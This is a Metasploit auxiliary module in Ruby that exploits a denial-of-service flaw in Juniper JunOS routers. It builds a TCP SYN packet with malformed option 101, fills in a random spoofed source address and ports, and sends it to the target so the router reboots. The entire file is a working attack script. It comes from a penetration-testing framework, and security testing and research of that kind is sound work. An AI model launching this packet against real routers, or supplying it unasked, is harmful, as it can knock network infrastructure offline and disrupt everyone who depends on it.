modules/auxiliary/dos/tcp/junos_tcp_opt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Juniper JunOS Malformed TCP Option',
'Description' => %q{ This module exploits a denial of service vulnerability
in Juniper Network's JunOS router operating system. By sending a TCP
packet with TCP option 101 set, an attacker can cause an affected
router to reboot.
},
'Author' => 'todb',
'License' => MSF_LICENSE,
'References' =>
[
['BID', '37670'],
['OSVDB', '61538'],
['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
]
)
register_options([
OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
])
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
end
def rport
datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i
end
def sport
datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i
end
def shost
datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
end
def run
open_pcap
p = PacketFu::TCPPacket.new
p.ip_daddr = rhost
p.ip_saddr = shost
p.ip_ttl = rand(128) + 128
p.tcp_sport = sport
p.tcp_dport = rport
p.tcp_flags.syn = 1
p.tcp_win = rand(4096)+1
p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol
p.recalc
print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")
capture_sendto(p,rhost)
close_pcap
end
end